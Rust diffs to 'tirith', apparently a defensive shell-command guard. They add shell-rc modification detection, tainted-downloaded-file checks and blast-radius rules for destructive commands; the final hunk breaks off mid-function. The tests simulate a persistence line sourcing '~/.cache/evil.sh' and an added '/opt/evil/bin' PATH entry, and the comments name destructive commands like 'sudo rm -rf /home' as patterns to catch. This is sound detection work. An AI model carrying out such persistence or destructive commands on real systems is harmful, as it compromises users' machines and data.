+    pub env_vars: Vec<String>,
+    /// Colon-split `$PATH` entries at capture time (order preserved).
+    pub path_dirs: Vec<String>,
+    /// Per shell-rc/profile file: relative-name → sha256 of its bytes. A file
+    /// that does not exist is recorded with the sha256 of the empty string so a
+    /// later *appearance* is detected as a change from "absent".
+    pub shell_rc_hashes: std::collections::BTreeMap<String, String>,
+    /// Absolute home directory used to resolve the shell-rc paths (recorded so
+    /// the after-snapshot resolves the identical set).
+    pub home: String,
+}
+
+/// Shell rc / profile files watched for modification during a `tirith watch`
+/// run. Mirrors the canonical list in `persistence.rs::SHELL_RC_FILES` plus the
+/// common PowerShell profile locations (only hashed when present).
+const WATCH_SHELL_RC_FILES: &[&str] = &[
+    ".bashrc",
+    ".bash_profile",
+    ".zshrc",
+    ".zprofile",
+    ".profile",
+    ".config/fish/config.fish",
+    ".config/powershell/Microsoft.PowerShell_profile.ps1",
+    "Documents/PowerShell/Microsoft.PowerShell_profile.ps1",
+    "Documents/WindowsPowerShell/Microsoft.PowerShell_profile.ps1",
+];
+
+/// Capture the current runtime state (env var names, `$PATH` entries, shell-rc
+/// hashes) for a `tirith watch` before/after comparison.
+///
+/// `home` is taken as a parameter (not read from `std::env` here) so the unit
+/// tests can point it at a `tempfile::tempdir()` without mutating process-global
+/// `HOME` — mutating env in tests is a libc data race (see PR #125 history).
+pub fn capture_runtime_state(home: &Path) -> RuntimeStateSnapshot {
+    let mut env_vars: Vec<String> = std::env::vars_os()
+        .map(|(k, _)| k.to_string_lossy().into_owned())
+        .collect();
+    env_vars.sort();
+
+    let path_dirs: Vec<String> = std::env::var_os("PATH")
+        .map(|p| {
+            std::env::split_paths(&p)
+                .map(|d| d.to_string_lossy().into_owned())
+                .collect()
+        })
+        .unwrap_or_default();
+
+    let mut shell_rc_hashes = std::collections::BTreeMap::new();
+    for rel in WATCH_SHELL_RC_FILES {
+        let path = home.join(rel);
+        // Hash present files; record the empty-string hash for absent ones so a
+        // later appearance reads as a modification, not a no-op.
+        let sha = if path.is_file() {
+            match sha256_file(&path) {
+                Ok(s) => s,
+                Err(_) => continue,
+            }
+        } else {
+            empty_sha256()
+        };
+        shell_rc_hashes.insert((*rel).to_string(), sha);
+    }
+
+    RuntimeStateSnapshot {
+        env_vars,
+        path_dirs,
+        shell_rc_hashes,
+        home: home.to_string_lossy().into_owned(),
+    }
+}
+
+/// Diff two runtime-state snapshots into the additive [`PostRunState`] plus the
+/// list of shell-rc files whose contents changed.
+///
+/// Returns `(state, modified_rc_files)` where `modified_rc_files` is the set of
+/// relative rc-file names whose sha256 differed between `before` and `after`
+/// (drives the [`crate::verdict::RuleId::PostRunShellRcModified`] finding).
+pub fn diff_runtime_state(
+    before: &RuntimeStateSnapshot,
+    after: &RuntimeStateSnapshot,
+) -> (PostRunState, Vec<String>) {
+    let before_env: std::collections::HashSet<&String> = before.env_vars.iter().collect();
+    let env_vars_added: Vec<String> = after
+        .env_vars
+        .iter()
+        .filter(|v| !before_env.contains(*v))
+        .cloned()
+        .collect();
+
+    let before_path: std::collections::HashSet<&String> = before.path_dirs.iter().collect();
+    let path_dirs_added: Vec<String> = after
+        .path_dirs
+        .iter()
+        .filter(|d| !before_path.contains(*d))
+        .cloned()
+        .collect();
+
+    let mut modified_rc_files: Vec<String> = Vec::new();
+    for (rel, after_sha) in &after.shell_rc_hashes {
+        match before.shell_rc_hashes.get(rel) {
+            Some(before_sha) if before_sha == after_sha => {}
+            // Changed hash, or a file that appeared (no prior entry) — both are
+            // modifications-during-run.
+            _ => modified_rc_files.push(rel.clone()),
+        }
+    }
+    modified_rc_files.sort();
+
+    (
+        PostRunState {
+            domains_contacted: Vec::new(),
+            env_vars_added,
+            path_dirs_added,
+            // domains_contacted is filled in by the CLI layer only under the
+            // experimental --with-net-hints opt-in; the pure diff never invents
+            // network claims.
+        },
+        modified_rc_files,
+    )
+}
+
+/// SHA-256 of the empty byte string. Used as the sentinel hash for an absent
+/// shell-rc file so a later appearance diffs as a change.
+fn empty_sha256() -> String {
+    format!("{:x}", Sha256::new().finalize())
+}
+
+/// Build the [`crate::verdict::Finding`] list for a `tirith watch` post-run
+/// diff. Currently emits one High [`crate::verdict::RuleId::PostRunShellRcModified`]
+/// finding listing every shell-rc file modified during the run, or no findings
+/// when none changed.
+///
+/// Kept in core (not the CLI) so the rule-firing behavior is unit-testable
+/// without spawning a process — it lives in `EXTERNALLY_TRIGGERED_RULES` and is
+/// covered by `watch_flags_shell_rc_modification` below.
+pub fn findings_for_modified_rc(modified_rc_files: &[String]) -> Vec<crate::verdict::Finding> {
+    use crate::verdict::{Finding, RuleId, Severity};
+    if modified_rc_files.is_empty() {
+        return Vec::new();
+    }
+    vec![Finding {
+        rule_id: RuleId::PostRunShellRcModified,
+        severity: Severity::High,
+        title: "Watched command modified a shell rc / profile file".to_string(),
+        description: format!(
+            "The watched command modified the following shell startup file(s) \
+             during its run: {}. A command rewriting your login shell is a \
+             persistence foothold — review the added lines before trusting it.",
+            modified_rc_files.join(", ")
+        ),
+        evidence: Vec::new(),
+        human_view: None,
+        agent_view: None,
+        mitre_id: Some("T1546.004".to_string()),
+        custom_rule_id: None,
+    }]
+}
+
 /// Create a checkpoint and then purge old ones with default limits.
 /// Convenience wrapper used in tests; CLI calls `create()` then `purge()` directly
 /// for distinct error messages.
@@ -835,6 +1032,110 @@ mod tests {
             remaining.len(),
             1,
             "exactly one new checkpoint should remain"
+        );
+    }
+
+    // --- M10 ch2: `tirith watch` runtime-state diff -------------------------
+
+    #[test]
+    fn watch_flags_shell_rc_modification() {
+        // Snapshot before, simulate an rc-file modification during the "run",
+        // snapshot after → the PostRunShellRcModified rule must fire High.
+        // Uses a tempdir as HOME; never mutates process-global env (libc race).
+        let home = tempfile::tempdir().unwrap();
+        let zshrc = home.path().join(".zshrc");
+        fs::write(&zshrc, "alias ll='ls -la'\n").unwrap();
+
+        let before = capture_runtime_state(home.path());
+
+        // Simulate the watched command appending a persistence line.
+        fs::write(&zshrc, "alias ll='ls -la'\nsource ~/.cache/evil.sh\n").unwrap();
+
+        let after = capture_runtime_state(home.path());
+
+        let (_state, modified) = diff_runtime_state(&before, &after);
+        assert_eq!(
+            modified,
+            vec![".zshrc".to_string()],
+            "the modified .zshrc must be detected"
+        );
+
+        let findings = findings_for_modified_rc(&modified);
+        assert_eq!(findings.len(), 1, "exactly one rc-modified finding");
+        assert_eq!(
+            findings[0].rule_id,
+            crate::verdict::RuleId::PostRunShellRcModified
+        );
+        assert_eq!(findings[0].severity, crate::verdict::Severity::High);
+        assert_eq!(
+            crate::verdict::action_from_findings(&findings),
+            crate::verdict::Action::Block,
+            "a High rc-modified finding must resolve to Block"
+        );
+    }
+
+    #[test]
+    fn watch_no_finding_when_rc_unchanged() {
+        // A run that touches no rc file must produce zero findings (clean diff).
+        let home = tempfile::tempdir().unwrap();
+        fs::write(home.path().join(".bashrc"), "export EDITOR=vim\n").unwrap();
+
+        // Diff a single captured snapshot against ITSELF. Capturing the live env
+        // twice would race other test threads that mutate process-global env
+        // (e.g. XDG_STATE_HOME) between the two reads; diffing one snapshot
+        // against itself isolates the pure-diff contract we mean to test here.
+        let snap = capture_runtime_state(home.path());
+
+        let (state, modified) = diff_runtime_state(&snap, &snap);
+        assert!(modified.is_empty(), "no rc file changed: {modified:?}");
+        assert!(
+            findings_for_modified_rc(&modified).is_empty(),
+            "clean run must emit no findings"
+        );
+        // An unchanged snapshot adds nothing to env / PATH.
+        assert!(state.env_vars_added.is_empty());
+        assert!(state.path_dirs_added.is_empty());
+        assert!(state.domains_contacted.is_empty());
+    }
+
+    #[test]
+    fn watch_detects_new_rc_file_and_path_addition() {
+        // A shell-rc file that did not exist before but appears after must be
+        // flagged (appearance == modification-from-absent). Also exercises the
+        // PATH set-difference on synthetic snapshots.
+        let home = tempfile::tempdir().unwrap();
+        // .zshrc absent at first snapshot.
+        let before = capture_runtime_state(home.path());
+        assert_eq!(
+            before.shell_rc_hashes.get(".zshrc").map(String::as_str),
+            Some(super::empty_sha256().as_str()),
+            "absent rc file recorded with empty-string sha"
+        );
+
+        // The watched command creates ~/.zshrc.
+        fs::write(home.path().join(".zshrc"), "export FOO=1\n").unwrap();
+        let after = capture_runtime_state(home.path());
+
+        let (_state, modified) = diff_runtime_state(&before, &after);
+        assert!(
+            modified.contains(&".zshrc".to_string()),
+            "a newly-created rc file must be flagged: {modified:?}"
+        );
+
+        // PATH set-difference: construct two snapshots that differ only in PATH.
+        let mut b = before.clone();
+        let mut a = before.clone();
+        b.path_dirs = vec!["/usr/bin".to_string(), "/bin".to_string()];
+        a.path_dirs = vec![
+            "/usr/bin".to_string(),
+            "/bin".to_string(),
+            "/opt/evil/bin".to_string(),
+        ];
+        let (state, _m) = diff_runtime_state(&b, &a);
+        assert_eq!(
+            state.path_dirs_added,
+            vec!["/opt/evil/bin".to_string()],
+            "only the newly-added PATH dir is reported"
         );
     }
 }

--- a/crates/tirith-core/src/engine.rs
+++ b/crates/tirith-core/src/engine.rs
@@ -1048,6 +1048,13 @@ fn apply_baseline(
     if !policy.baseline_enabled {
         return; // D2: default OFF — zero baseline I/O on the hot path.
     }
+    // F4: if the per-install salt is neither readable nor writable, every hash
+    // would differ each run, so EVERY pattern would look "first time" forever.
+    // `baseline::session_disabled()` warns once and disables baseline for the
+    // session; skip the whole block rather than emit perpetual false anomalies.
+    if crate::baseline::session_disabled() {
+        return;
+    }
     // Only react to findings that already fired. Skip the anomaly rules
     // themselves so we never observe-on-observe.
     let real_findings: Vec<usize> = findings
@@ -1233,11 +1240,18 @@ fn tmp_roots() -> Vec<std::path::PathBuf> {
 ///
 ///   * [`crate::verdict::RuleId::BlastWritesSystemPath`] (High) — target is `/`,
 ///     `/home`, `/usr`, `/etc`, `~`, … by literal shape.
-///   * [`crate::verdict::RuleId::BlastEmptyVarGlob`] (High) — a `"$VAR/"`-shaped
-///     target where `VAR` resolves to empty in the env snapshot taken here and
-///     passed into the (otherwise pure) detector.
+///   * [`crate::verdict::RuleId::BlastEmptyVarGlob`] — a `"$VAR/"`-shaped target
+///     where `VAR` resolves to empty in the env snapshot taken here and passed
+///     into the (otherwise pure) detector. **Severity is split (F2):** High when
+///     `VAR` is PRESENT-and-empty in tirith's env (unambiguous collapse to `/`);
+///     Info when `VAR` is merely ABSENT (it could be a benign non-exported
+///     shell-local that IS set — tirith cannot see shell-locals, so it must not
+///     BLOCK on the ambiguous case).
 ///   * [`crate::verdict::RuleId::BlastFindDelete`] (Medium) — `find … -delete`.
 ///   * [`crate::verdict::RuleId::BlastRsyncDelete`] (Medium) — `rsync --delete`.
+///
+/// A leading `sudo`/`doas` is unwrapped before the destructive leader is
+/// matched, so `sudo rm -rf /home` is recognized as the `rm` it really is (C1).
 ///
 /// The cheap check does NOT stat, walk the filesystem, expand globs, or count
 /// anything — `rm -rf ./dist` (a repo-relative target) produces no hot-path
@@ -1253,6 +1267,35 @@ fn tmp_roots() -> Vec<std::path::PathBuf> {
 /// [`BlastLargeFileCount`](crate::verdict::RuleId::BlastLargeFileCount)). It is
 /// NEVER reachable from this `analyze` path — the `tirith check` hot path never
 /// walks the filesystem; that is `preview`'s job.
+///
+/// # M10 ch3 — tainted-content hot lookup
+///
+/// A THIRD hot subset runs in `ScanContext::Exec`: when the command leader (or,
+/// for an interpreter like `bash`/`sh`/`source`, its first script argument)
+/// resolves to a path recorded in the taint store
+/// ([`crate::taint`]), [`check_taint_hot`] fires
+/// [`crate::verdict::RuleId::ExecOfTaintedFile`] (High) or
+/// [`CommandSourcedFromTaintedFile`](crate::verdict::RuleId::CommandSourcedFromTaintedFile)
+/// (High). A tainted path is NOT a regex/byte signal, so — like the ch5/ch6
+/// subsets — the tier-1 fast-exit is forced past (the `taint_triggered` gate
+/// below) ONLY when the store is non-empty (a single `metadata()` stat), so a
+/// machine that has never run `tirith fetch --save` pays nothing. The per-leader
+/// lookup itself is backed by a per-process, mtime-invalidated cache.
+///
+/// # M10 ch5 — baseline gate (opt-in, default OFF)
+///
+/// AFTER tier-3 rules produce findings, [`apply_baseline`] runs — but it is a
+/// no-op unless `policy.baseline_enabled` is set (design-decision D2). When
+/// enabled AND at least one rule already fired, it records a privacy-hashed
+/// observation per firing finding and, for a first-time/rare pattern, appends an
+/// Info anomaly ([`AnomalyFirstTimeInThisRepo`](crate::verdict::RuleId::AnomalyFirstTimeInThisRepo) /
+/// [`AnomalyRareInBaseline`](crate::verdict::RuleId::AnomalyRareInBaseline)).
+/// It never changes the action. The store records only salted-sha256 hashes and
+/// low-cardinality categoricals — never raw hostnames/paths. If the per-install
+/// salt is neither readable nor writable, baseline is disabled for the session
+/// (warned once) rather than emitting perpetual false `first-time` anomalies
+/// (F4). Because it runs only when a finding already exists and is flag-gated, it
+/// adds NO tier-1 force-past and zero I/O on an opted-out machine.
 pub fn analyze(ctx: &AnalysisContext) -> Verdict {
     analyze_inner(ctx).0
 }

--- a/crates/tirith-core/src/engine.rs
+++ b/crates/tirith-core/src/engine.rs
@@ -834,6 +834,38 @@ fn tmp_roots() -> Vec<std::path::PathBuf> {
 /// `git commit` is not a regex/byte signal, so the tier-1 fast-exit is forced
 /// past (only for a hook-triggering leader) when the flag is set — see the
 /// `hooks_guard_triggered` gate below.
+///
+/// # M10 ch1 — blast-radius hot/cold split (load-bearing)
+///
+/// The exec/paste hot path runs ONLY the CHEAP, filesystem-free blast-radius
+/// subset via [`crate::blast_radius::cheap_check`] (always-on, no policy flag,
+/// gated at tier-1 by the `destructive_fs_op` PATTERN_TABLE entry). When the
+/// parsed leader is a destructive op (`rm` / `mv` / `chmod` / `find … -delete` /
+/// `rsync --delete`), the cheap check emits a finding ONLY when a target is
+/// dangerous by STRING SHAPE alone:
+///
+///   * [`crate::verdict::RuleId::BlastWritesSystemPath`] (High) — target is `/`,
+///     `/home`, `/usr`, `/etc`, `~`, … by literal shape.
+///   * [`crate::verdict::RuleId::BlastEmptyVarGlob`] (High) — a `"$VAR/"`-shaped
+///     target where `VAR` resolves to empty in the env snapshot taken here and
+///     passed into the (otherwise pure) detector.
+///   * [`crate::verdict::RuleId::BlastFindDelete`] (Medium) — `find … -delete`.
+///   * [`crate::verdict::RuleId::BlastRsyncDelete`] (Medium) — `rsync --delete`.
+///
+/// The cheap check does NOT stat, walk the filesystem, expand globs, or count
+/// anything — `rm -rf ./dist` (a repo-relative target) produces no hot-path
+/// finding by design.
+///
+/// The full filesystem-walking simulator
+/// ([`crate::blast_radius::simulate`] + [`crate::blast_radius::report_findings`])
+/// runs ONLY under explicit `tirith preview -- "<cmd>"`. It walks the target
+/// tree (depth ≤ 5, ≤ 100k files), expands globs against the cwd, counts
+/// files/dirs/symlinks, and emits the SIMULATOR-ONLY rules
+/// ([`BlastDeletesOutsideRepo`](crate::verdict::RuleId::BlastDeletesOutsideRepo),
+/// [`BlastSymlinkTraversal`](crate::verdict::RuleId::BlastSymlinkTraversal),
+/// [`BlastLargeFileCount`](crate::verdict::RuleId::BlastLargeFileCount)). It is
+/// NEVER reachable from this `analyze` path — the `tirith check` hot path never
+/// walks the filesystem; that is `preview`'s job.
 pub fn analyze(ctx: &AnalysisContext) -> Verdict {
     analyze_inner(ctx).0
 }
@@ -1329,6 +1361,25 @@ fn analyze_inner(ctx: &AnalysisContext) -> (Verdict, Policy) {
             if policy.hooks_guard_enabled {
                 findings.extend(check_repo_hooks_hot(ctx));
             }
+
+            // M10 ch1 — blast-radius CHEAP subset. Always-on (no policy flag),
+            // gated at tier-1 by the `destructive_fs_op` PATTERN_TABLE entry.
+            // This runs ONLY the filesystem-free string-shape check
+            // (`blast_radius::cheap_check`): a destructive leader
+            // (rm/mv/chmod/find -delete/rsync --delete) whose target is
+            // obviously dangerous by shape (`/`, `/home`, `/usr`, `~`, or a
+            // `"$VAR/"` glob with an empty VAR). The env snapshot is taken ONCE
+            // here and passed in so the detector stays pure (no std::env read
+            // inside the rule — the libc setenv race, PR #125).
+            //
+            // The full filesystem-walking simulator
+            // (`blast_radius::simulate` + `report_findings`) is NEVER called
+            // here — it runs ONLY under explicit `tirith preview`. See the
+            // `analyze` doc-comment for the hot/cold split.
+            let blast_env = crate::blast_radius::env_snapshot();
+            findings.extend(crate::blast_radius::cheap_check(
+                &ctx.input, ctx.shell, &blast_env,
+            ));
         }
 
         let cred_findings =

--- a/crates/tirith-core/src/engine.rs
+++ b/crates/tirith-core/src/engine.rs
@@ -765,6 +765,171 @@ fn check_repo_hooks_hot(ctx: &AnalysisContext) -> Vec<Finding> {
         .collect()
 }
 
+/// Interpreters / exec wrappers whose first non-flag file argument is the thing
+/// actually run. `bash ./install.sh` runs `./install.sh`, so a tainted
+/// `./install.sh` must fire even though the leader is `bash`. Matched by base
+/// name (path-stripped). Kept small + literal — this is the hot path.
+const TAINT_INTERPRETER_LEADERS: &[&str] = &[
+    "sh", "bash", "zsh", "dash", "ksh", "fish", "python", "python2", "python3", "ruby", "perl",
+    "node", "nodejs", "deno", "bun", "php",
+];
+
+/// `source` / `.` builtins — sourcing runs the file's commands in the current
+/// shell. A tainted sourced file fires `CommandSourcedFromTaintedFile`.
+const TAINT_SOURCE_LEADERS: &[&str] = &["source", "."];
+
+/// Does `leader` look like a path (so the leader ITSELF is the executed file,
+/// e.g. `./install.sh`, `/tmp/x.sh`, `bin/run`)? A bare command name resolved
+/// via `$PATH` (`bash`, `git`) is NOT a path. We treat anything containing a
+/// path separator as a path — the common `./x`, `dir/x`, `/abs/x` shapes.
+fn taint_leader_is_pathlike(leader: &str) -> bool {
+    leader.contains('/') || leader.contains('\\')
+}
+
+/// M10 ch3 — the tainted-content hot check. When the parsed command leader is a
+/// tainted path (`./install.sh`), fire [`crate::verdict::RuleId::ExecOfTaintedFile`]
+/// (High). When the leader is an interpreter (`bash ./install.sh`) whose first
+/// non-flag file argument is tainted, fire the same rule against that argument.
+/// When the leader is `source` / `.` and the sourced file is tainted, fire
+/// [`crate::verdict::RuleId::CommandSourcedFromTaintedFile`] (Medium).
+///
+/// Caller gates this behind `ScanContext::Exec` and a non-empty taint store
+/// (the `taint_triggered` tier-1 force-past). The per-leader lookup itself is a
+/// path-key match against the per-process-cached store
+/// ([`crate::taint::is_tainted`]).
+fn check_taint_hot(ctx: &AnalysisContext) -> Vec<Finding> {
+    let Some(store) = crate::taint::store_path() else {
+        return Vec::new();
+    };
+    check_taint_hot_with_store(ctx, &store)
+}
+
+/// Store-parameterized core of [`check_taint_hot`]. Split out so the leader /
+/// interpreter / `source` parsing is unit-testable against a
+/// `tempfile::tempdir()` store WITHOUT touching the real `state_dir()` or
+/// mutating `XDG_STATE_HOME` (the libc setenv race, PR #125).
+fn check_taint_hot_with_store(ctx: &AnalysisContext, store: &std::path::Path) -> Vec<Finding> {
+    use crate::tokenize;
+    use crate::verdict::{RuleId, Severity};
+
+    let segs = tokenize::tokenize(&ctx.input, ctx.shell);
+    let Some(first) = segs.first() else {
+        return Vec::new();
+    };
+    let Some(leader_raw) = first.command.as_deref() else {
+        return Vec::new();
+    };
+    let leader = leader_raw.trim_matches(|c: char| c == '"' || c == '\'');
+    if leader.is_empty() {
+        return Vec::new();
+    }
+
+    let cwd: Option<std::path::PathBuf> = ctx
+        .cwd
+        .as_deref()
+        .map(std::path::PathBuf::from)
+        .or_else(|| std::env::current_dir().ok());
+    let cwd_ref = cwd.as_deref();
+    let base = leader.rsplit('/').next().unwrap_or(leader);
+
+    // First non-flag argument (the script path for interpreters / source).
+    let file_arg = first
+        .args
+        .iter()
+        .map(|a| a.trim_matches(|c: char| c == '"' || c == '\''))
+        .find(|a| !a.is_empty() && !a.starts_with('-'));
+
+    // Case 1 — `source ./tainted.sh` / `. ./tainted.sh`. Medium.
+    if TAINT_SOURCE_LEADERS.contains(&base) {
+        if let Some(arg) = file_arg {
+            if let Some(entry) =
+                crate::taint::is_tainted_at(store, std::path::Path::new(arg), cwd_ref)
+            {
+                return vec![taint_finding(
+                    RuleId::CommandSourcedFromTaintedFile,
+                    Severity::Medium,
+                    "Sourcing a file downloaded from a risky source",
+                    arg,
+                    &entry,
+                )];
+            }
+        }
+        return Vec::new();
+    }
+
+    // Case 2 — interpreter wrapper (`bash ./tainted.sh`). High, against the
+    // script argument (the thing actually executed).
+    if TAINT_INTERPRETER_LEADERS.contains(&base) {
+        if let Some(arg) = file_arg {
+            if let Some(entry) =
+                crate::taint::is_tainted_at(store, std::path::Path::new(arg), cwd_ref)
+            {
+                return vec![taint_finding(
+                    RuleId::ExecOfTaintedFile,
+                    Severity::High,
+                    "Executing a file downloaded from a risky source",
+                    arg,
+                    &entry,
+                )];
+            }
+        }
+        return Vec::new();
+    }
+
+    // Case 3 — the leader itself is the executed file (`./install.sh`). High.
+    if taint_leader_is_pathlike(leader) {
+        if let Some(entry) =
+            crate::taint::is_tainted_at(store, std::path::Path::new(leader), cwd_ref)
+        {
+            return vec![taint_finding(
+                RuleId::ExecOfTaintedFile,
+                Severity::High,
+                "Executing a file downloaded from a risky source",
+                leader,
+                &entry,
+            )];
+        }
+    }
+
+    Vec::new()
+}
+
+/// Build a taint finding. Echoes the recorded origin / source so `tirith why`
+/// and the prompt show where the mark came from, without re-reading the store.
+fn taint_finding(
+    rule_id: crate::verdict::RuleId,
+    severity: crate::verdict::Severity,
+    title: &str,
+    typed_path: &str,
+    entry: &crate::taint::TaintEntry,
+) -> Finding {
+    use crate::verdict::Evidence;
+    let mut detail = format!("origin: {}", entry.origin);
+    if let Some(ref url) = entry.source_url {
+        detail.push_str(&format!("; source_url: {url}"));
+    }
+    if let Some(ref repo) = entry.source_repo {
+        detail.push_str(&format!("; source_repo: {repo}"));
+    }
+    Finding {
+        rule_id,
+        severity,
+        title: title.to_string(),
+        description: format!(
+            "`{typed_path}` was recorded as tainted (downloaded from a risky source). \
+             {detail}. Review the file, then run `tirith taint clear {typed_path}` once you \
+             trust it. The mark is not auto-cleared by chmod +x or a parse check."
+        ),
+        evidence: vec![Evidence::Text {
+            detail: format!("tainted path: {} ({})", entry.path, detail),
+        }],
+        human_view: None,
+        agent_view: None,
+        mitre_id: Some("T1105".to_string()),
+        custom_rule_id: None,
+    }
+}
+
 /// The `/tmp`-equivalent roots: `/tmp` plus `$TMPDIR` (macOS uses a per-user
 /// `$TMPDIR` under `/var/folders`). Used by the hot-path `ExecInTmp` /
 /// writable-dir checks.
@@ -967,6 +1132,15 @@ fn analyze_inner(ctx: &AnalysisContext) -> (Verdict, Policy) {
         (false, false)
     };
 
+    // M10 ch3 — the tainted-content check is a runtime-state lookup (the parsed
+    // leader being a tainted path is not a regex/byte signal), so a tainted
+    // `bash ./install.sh` would fast-exit at tier-1 before the taint block ran
+    // (the tier-1 gating bug class — see CLAUDE.md). Force past the fast-exit
+    // ONLY when the taint store is non-empty: a single `metadata()` stat, so a
+    // machine that has never marked a file pays nothing. Gated to Exec so paste
+    // / file scan never pay even the stat. Mirrors `exec_guard_triggered`.
+    let taint_triggered = ctx.scan_context == ScanContext::Exec && crate::taint::store_nonempty();
+
     let tier1_ms = tier1_start.elapsed().as_secs_f64() * 1000.0;
 
     if !byte_scan_triggered
@@ -974,6 +1148,7 @@ fn analyze_inner(ctx: &AnalysisContext) -> (Verdict, Policy) {
         && !exec_bidi_triggered
         && !exec_guard_triggered
         && !hooks_guard_triggered
+        && !taint_triggered
     {
         let total_ms = start.elapsed().as_secs_f64() * 1000.0;
         return (
@@ -1380,6 +1555,18 @@ fn analyze_inner(ctx: &AnalysisContext) -> (Verdict, Policy) {
             findings.extend(crate::blast_radius::cheap_check(
                 &ctx.input, ctx.shell, &blast_env,
             ));
+
+            // M10 ch3 — tainted-content check. Always-on (no policy flag), but
+            // the per-leader lookup short-circuits to a near-noop when the taint
+            // store is empty/absent (and the tier-1 force-past `taint_triggered`
+            // only fires when the store is non-empty, so a no-taint machine
+            // never even reaches here unless some OTHER signal already pulled us
+            // past the fast-exit). When the parsed leader (or, for an
+            // interpreter wrapper / `source`, its file argument) is a tainted
+            // path, this fires ExecOfTaintedFile (High) /
+            // CommandSourcedFromTaintedFile (Medium). The store is path-keyed
+            // and cached per-process (5s TTL) — see `crate::taint`.
+            findings.extend(check_taint_hot(ctx));
         }
 
         let cred_findings =
@@ -2541,5 +2728,133 @@ mod tests {
             })
             .count();
         assert_eq!(n, 1, "duplicate seed must emit exactly once across chunks");
+    }
+
+    // ---- M10 ch3 — tainted-content hot-path tests --------------------------
+    //
+    // These drive `check_taint_hot_with_store` against a `tempfile::tempdir()`
+    // store + cwd so they never touch the real `state_dir()` and never mutate
+    // `XDG_STATE_HOME` (the libc setenv race, PR #125).
+
+    fn taint_store(dir: &std::path::Path) -> std::path::PathBuf {
+        dir.join("taint.jsonl")
+    }
+
+    #[test]
+    fn taint_hot_fires_on_tainted_leader_path() {
+        let dir = tempfile::tempdir().unwrap();
+        let store = taint_store(dir.path());
+        let cwd = dir.path();
+        crate::taint::mark_tainted_at(
+            &store,
+            std::path::Path::new("./install.sh"),
+            Some(cwd),
+            "fetch --save",
+            Some("https://untrusted.example/install.sh".to_string()),
+            None,
+        )
+        .unwrap();
+
+        let ctx = exec_ctx_in("./install.sh --yes", cwd);
+        let findings = check_taint_hot_with_store(&ctx, &store);
+        assert_eq!(findings.len(), 1, "tainted leader should fire one finding");
+        assert_eq!(
+            findings[0].rule_id,
+            crate::verdict::RuleId::ExecOfTaintedFile
+        );
+        assert_eq!(findings[0].severity, crate::verdict::Severity::High);
+    }
+
+    #[test]
+    fn taint_hot_fires_on_interpreter_wrapped_tainted_file() {
+        let dir = tempfile::tempdir().unwrap();
+        let store = taint_store(dir.path());
+        let cwd = dir.path();
+        crate::taint::mark_tainted_at(
+            &store,
+            std::path::Path::new("./install.sh"),
+            Some(cwd),
+            "fetch --save",
+            None,
+            None,
+        )
+        .unwrap();
+
+        // `bash ./install.sh` runs the tainted file even though the leader is bash.
+        let ctx = exec_ctx_in("bash ./install.sh", cwd);
+        let findings = check_taint_hot_with_store(&ctx, &store);
+        assert_eq!(findings.len(), 1);
+        assert_eq!(
+            findings[0].rule_id,
+            crate::verdict::RuleId::ExecOfTaintedFile
+        );
+        assert_eq!(findings[0].severity, crate::verdict::Severity::High);
+    }
+
+    #[test]
+    fn taint_hot_fires_medium_on_sourced_tainted_file() {
+        let dir = tempfile::tempdir().unwrap();
+        let store = taint_store(dir.path());
+        let cwd = dir.path();
+        crate::taint::mark_tainted_at(
+            &store,
+            std::path::Path::new("./env.sh"),
+            Some(cwd),
+            "fetch --save",
+            None,
+            None,
+        )
+        .unwrap();
+
+        let ctx = exec_ctx_in("source ./env.sh", cwd);
+        let findings = check_taint_hot_with_store(&ctx, &store);
+        assert_eq!(findings.len(), 1);
+        assert_eq!(
+            findings[0].rule_id,
+            crate::verdict::RuleId::CommandSourcedFromTaintedFile
+        );
+        assert_eq!(findings[0].severity, crate::verdict::Severity::Medium);
+
+        // The `.` builtin form fires the same Medium rule.
+        let ctx_dot = exec_ctx_in(". ./env.sh", cwd);
+        let findings_dot = check_taint_hot_with_store(&ctx_dot, &store);
+        assert_eq!(findings_dot.len(), 1);
+        assert_eq!(
+            findings_dot[0].rule_id,
+            crate::verdict::RuleId::CommandSourcedFromTaintedFile
+        );
+    }
+
+    #[test]
+    fn taint_hot_no_fire_on_untainted_path() {
+        let dir = tempfile::tempdir().unwrap();
+        let store = taint_store(dir.path());
+        let cwd = dir.path();
+        crate::taint::mark_tainted_at(
+            &store,
+            std::path::Path::new("./install.sh"),
+            Some(cwd),
+            "fetch --save",
+            None,
+            None,
+        )
+        .unwrap();
+
+        // A different, untainted file produces nothing.
+        let ctx = exec_ctx_in("bash ./other.sh", cwd);
+        assert!(check_taint_hot_with_store(&ctx, &store).is_empty());
+
+        // A PATH-resolved bare command (no path separator) is not a leader path.
+        let ctx_bare = exec_ctx_in("ls -la", cwd);
+        assert!(check_taint_hot_with_store(&ctx_bare, &store).is_empty());
+    }
+
+    #[test]
+    fn taint_hot_empty_store_is_noop() {
+        let dir = tempfile::tempdir().unwrap();
+        let store = taint_store(dir.path());
+        // No marks written.
+        let ctx = exec_ctx_in("bash ./install.sh", dir.path());
+        assert!(check_taint_hot_with_store(&ctx, &store).is_empty());
     }
 }

--- a/crates/tirith-core/src/engine.rs
+++ b/crates/tirith-core/src/engine.rs
@@ -930,6 +930,228 @@ fn taint_finding(
     }
 }
 
+/// M10 ch5 — leaders that classify the command's ecosystem for the anomaly
+/// baseline tuple. A pure leader → ecosystem-label map; `None` for leaders that
+/// are not package/ecosystem commands. Low-cardinality, non-identifying.
+fn baseline_ecosystem_for_leader(leader: &str) -> Option<&'static str> {
+    match leader {
+        "npm" | "npx" | "yarn" | "pnpm" => Some("npm"),
+        "pip" | "pip3" | "pipx" | "poetry" | "uv" => Some("pypi"),
+        "cargo" => Some("crates"),
+        "go" => Some("go"),
+        "gem" => Some("rubygems"),
+        "docker" | "podman" => Some("docker"),
+        "apt" | "apt-get" => Some("apt"),
+        "dnf" => Some("dnf"),
+        "yum" => Some("yum"),
+        "brew" => Some("brew"),
+        "pacman" => Some("pacman"),
+        "scoop" => Some("scoop"),
+        "kubectl" | "helm" => Some("k8s"),
+        "git" => Some("git"),
+        _ => None,
+    }
+}
+
+/// M10 ch5 — the shared (per-analysis) components of the anomaly-baseline
+/// tuple: ecosystem (from the command leader), sudo flag, and the salted cwd /
+/// repo hash. Computed ONCE per analysis and paired with each firing finding's
+/// `rule_id` + per-finding host hash. Returns the components plus the bare,
+/// de-sudo'd leader (so the per-finding host derivation and ecosystem agree on
+/// the same parse).
+fn baseline_shared_components(ctx: &AnalysisContext) -> (Option<String>, bool, Option<String>) {
+    use crate::tokenize;
+
+    let segs = tokenize::tokenize(&ctx.input, ctx.shell);
